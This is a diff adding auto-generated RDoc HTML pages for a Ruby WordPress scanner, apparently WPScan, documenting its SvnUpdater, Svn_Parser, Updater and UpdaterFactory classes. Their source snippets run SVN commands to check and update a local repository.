<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">SvnUpdater</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Constants -->
<div id="constants-list" class="section">
<h3 class="section-header">Constants</h3>
<dl>
<dt><a name="REVISION_PATTERN">REVISION_PATTERN</a></dt>
<dd class="description"></dd>
<dt><a name="TRUNK_URL">TRUNK_URL</a></dt>
<dd class="description"></dd>
</dl>
</div>
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="is_installed-3F-method" class="method-detail ">
<a name="method-i-is_installed-3F"></a>
<div class="method-heading">
<span class="method-name">is_installed?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="is_installed-3F-source">
<pre>
<span class="ruby-comment"># File lib/updater/svn_updater.rb, line 26</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">is_installed?</span>
<span class="ruby-node">%[svn info &quot;#@repo_directory&quot; --xml 2&gt;&amp;1]</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/revision=/</span> <span class="ruby-operator">?</span> <span class="ruby-keyword">true</span> <span class="ruby-operator">:</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- is_installed-3F-source -->
</div>
</div><!-- is_installed-3F-method -->
<div id="local_revision_number-method" class="method-detail ">
<a name="method-i-local_revision_number"></a>
<div class="method-heading">
<span class="method-name">local_revision_number</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="local_revision_number-source">
<pre>
<span class="ruby-comment"># File lib/updater/svn_updater.rb, line 30</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">local_revision_number</span>
<span class="ruby-identifier">local_revision</span> = <span class="ruby-node">%[svn info &quot;#@repo_directory&quot; --xml 2&gt;&amp;1]</span>
<span class="ruby-identifier">local_revision</span>[<span class="ruby-constant">REVISION_PATTERN</span>, <span class="ruby-value">1</span>].<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- local_revision_number-source -->
</div>
</div><!-- local_revision_number-method -->
<div id="update-method" class="method-detail ">
<a name="method-i-update"></a>
<div class="method-heading">
<span class="method-name">update</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="update-source">
<pre>
<span class="ruby-comment"># File lib/updater/svn_updater.rb, line 35</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">update</span>
<span class="ruby-node">%[svn up &quot;#@repo_directory&quot;]</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- update-source -->
</div>
</div><!-- update-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

369
doc/Svn_Parser.html Normal file
View File

@@ -0,0 +1,369 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Svn_Parser</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpstools/parse_svn_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpstools/parse_svn.rb">lib/wpstools/parse_svn.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-parse">#parse</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Svn_Parser</h1>
<div id="description" class="description">
<p>This Class Parses SVN Repositories via HTTP</p>
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="keep_empty_dirs-attribute-method" class="method-detail">
<a name="keep_empty_dirs"></a>
<a name="keep_empty_dirs="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">keep_empty_dirs</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="svn_root-attribute-method" class="method-detail">
<a name="svn_root"></a>
<a name="svn_root="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">svn_root</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="verbose-attribute-method" class="method-detail">
<a name="verbose"></a>
<a name="verbose="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">verbose</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(svn_root, verbose, keep_empty_dirs = false)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpstools/parse_svn.rb, line 26</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">svn_root</span>, <span class="ruby-identifier">verbose</span>, <span class="ruby-identifier">keep_empty_dirs</span> = <span class="ruby-keyword">false</span>)
<span class="ruby-ivar">@svn_root</span> = <span class="ruby-identifier">svn_root</span>
<span class="ruby-ivar">@verbose</span> = <span class="ruby-identifier">verbose</span>
<span class="ruby-ivar">@keep_empty_dirs</span> = <span class="ruby-identifier">keep_empty_dirs</span>
<span class="ruby-ivar">@svn_browser</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>
<span class="ruby-ivar">@svn_hydra</span> = <span class="ruby-ivar">@svn_browser</span>.<span class="ruby-identifier">hydra</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="parse-method" class="method-detail ">
<a name="method-i-parse"></a>
<div class="method-heading">
<span class="method-name">parse</span><span
class="method-args">(dirs=nil)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="parse-source">
<pre>
<span class="ruby-comment"># File lib/wpstools/parse_svn.rb, line 34</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">parse</span>(<span class="ruby-identifier">dirs</span>=<span class="ruby-keyword">nil</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">dirs</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">dirs</span> = <span class="ruby-identifier">get_root_directories</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">urls</span> = <span class="ruby-identifier">get_svn_project_urls</span>(<span class="ruby-identifier">dirs</span>)
<span class="ruby-identifier">get_svn_file_entries</span>(<span class="ruby-identifier">urls</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- parse-source -->
</div>
</div><!-- parse-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

438
doc/Updater.html Normal file
View File

@@ -0,0 +1,438 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Updater</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/updater/updater_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/updater/updater.rb">lib/updater/updater.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-is_installed-3F">#is_installed?</a></li>
<li><a href="#method-i-local_revision_number">#local_revision_number</a></li>
<li><a href="#method-i-raise_must_be_implemented">#raise_must_be_implemented</a></li>
<li><a href="#method-i-update">#update</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Updater</h1>
<div id="description" class="description">
<p>This class act as an absract one</p>
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="repo_directory-attribute-method" class="method-detail">
<a name="repo_directory"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">repo_directory</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(repo_directory = nil)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>TODO : add a last / to <a
href="Updater.html#attribute-i-repo_directory">repo_directory</a> if its
not present</p>
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/updater/updater.rb, line 25</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">repo_directory</span> = <span class="ruby-keyword">nil</span>)
<span class="ruby-ivar">@repo_directory</span> = <span class="ruby-identifier">repo_directory</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="is_installed-3F-method" class="method-detail ">
<a name="method-i-is_installed-3F"></a>
<div class="method-heading">
<span class="method-name">is_installed?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="is_installed-3F-source">
<pre>
<span class="ruby-comment"># File lib/updater/updater.rb, line 29</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">is_installed?</span>
<span class="ruby-identifier">raise_must_be_implemented</span>()
<span class="ruby-keyword">end</span></pre>
</div><!-- is_installed-3F-source -->
</div>
</div><!-- is_installed-3F-method -->
<div id="local_revision_number-method" class="method-detail ">
<a name="method-i-local_revision_number"></a>
<div class="method-heading">
<span class="method-name">local_revision_number</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="local_revision_number-source">
<pre>
<span class="ruby-comment"># File lib/updater/updater.rb, line 33</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">local_revision_number</span>
<span class="ruby-identifier">raise_must_be_implemented</span>()
<span class="ruby-keyword">end</span></pre>
</div><!-- local_revision_number-source -->
</div>
</div><!-- local_revision_number-method -->
<div id="update-method" class="method-detail ">
<a name="method-i-update"></a>
<div class="method-heading">
<span class="method-name">update</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="update-source">
<pre>
<span class="ruby-comment"># File lib/updater/updater.rb, line 37</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">update</span>
<span class="ruby-identifier">raise_must_be_implemented</span>()
<span class="ruby-keyword">end</span></pre>
</div><!-- update-source -->
</div>
</div><!-- update-method -->
</div><!-- public-instance-method-details -->
<div id="protected-instance-method-details" class="method-section section">
<h3 class="section-header">Protected Instance Methods</h3>
<div id="raise_must_be_implemented-method" class="method-detail ">
<a name="method-i-raise_must_be_implemented"></a>
<div class="method-heading">
<span class="method-name">raise_must_be_implemented</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="raise_must_be_implemented-source">
<pre>
<span class="ruby-comment"># File lib/updater/updater.rb, line 43</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">raise_must_be_implemented</span>
<span class="ruby-identifier">raise</span> <span class="ruby-string">&quot;The method must be implemented&quot;</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- raise_must_be_implemented-source -->
</div>
</div><!-- raise_must_be_implemented-method -->
</div><!-- protected-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

308
doc/UpdaterFactory.html Normal file
View File

@@ -0,0 +1,308 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: UpdaterFactory</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/updater/updater_factory_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/updater/updater_factory.rb">lib/updater/updater_factory.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-available_updaters_classes">::available_updaters_classes</a></li>
<li><a href="#method-c-get_updater">::get_updater</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">UpdaterFactory</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="get_updater-method" class="method-detail ">
<a name="method-c-get_updater"></a>
<div class="method-heading">
<span class="method-name">get_updater</span><span
class="method-args">(repo_directory)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="get_updater-source">
<pre>
<span class="ruby-comment"># File lib/updater/updater_factory.rb, line 21</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">get_updater</span>(<span class="ruby-identifier">repo_directory</span>)
<span class="ruby-keyword">self</span>.<span class="ruby-identifier">available_updaters_classes</span>().<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">updater_symbol</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">updater</span> = <span class="ruby-constant">Object</span>.<span class="ruby-identifier">const_get</span>(<span class="ruby-identifier">updater_symbol</span>).<span class="ruby-identifier">new</span>(<span class="ruby-identifier">repo_directory</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">updater</span>.<span class="ruby-identifier">is_installed?</span>
<span class="ruby-keyword">return</span> <span class="ruby-identifier">updater</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">nil</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- get_updater-source -->
</div>
</div><!-- get_updater-method -->
</div><!-- public-class-method-details -->
<div id="protected-class-method-details" class="method-section section">
<h3 class="section-header">Protected Class Methods</h3>
<div id="available_updaters_classes-method" class="method-detail ">
<a name="method-c-available_updaters_classes"></a>
<div class="method-heading">
<span class="method-name">available_updaters_classes</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>return array of class symbols</p>
<div class="method-source-code" id="available_updaters_classes-source">
<pre>
<span class="ruby-comment"># File lib/updater/updater_factory.rb, line 35</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">available_updaters_classes</span>
<span class="ruby-constant">Object</span>.<span class="ruby-identifier">constants</span>.<span class="ruby-identifier">grep</span>(<span class="ruby-regexp">/^.+Updater$/</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- available_updaters_classes-source -->
</div>
